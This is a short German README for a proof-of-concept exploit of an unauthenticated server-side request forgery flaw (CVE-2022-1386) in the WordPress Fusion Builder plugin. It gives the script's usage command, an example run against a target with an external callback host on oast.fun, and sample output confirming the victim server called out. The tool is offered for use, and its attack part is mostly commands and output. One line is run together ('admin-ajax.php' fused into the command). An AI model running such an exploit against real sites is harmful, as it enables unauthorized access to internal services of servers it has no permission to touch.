
Unauthentifizierter SSRF-PoC in WordPress Fusion Builder <3.6.2 (CVE-2022-1386)
Nicht authentifizierte Server-Side-Request-Forgery (SSRF) im Fusion-Builder-Plugin (verwendet vom Avada-Theme für WordPress) vor Version 3.6.2.
Ermöglicht Angreifern, HTTP-Anfragen an beliebige URLs zu senden, möglicherweise mit dem Ziel interner Dienste.
admin-ajax.phppython3 exploit_cve_2022_1386.py <target_url> <your_callback_url>
Beispiel:
python3 exploit_cve_2022_1386.py https://vulnerable.site https://abc123.oast.fun
Verwenden Sie Interact.sh oder [Burp Collaborator], um den Callback zu empfangen.
[*] Fetching nonce from target...
[*] Sending SSRF payload to https://abc123.oast.fun...
[+] SSRF confirmed: received callback from victim server.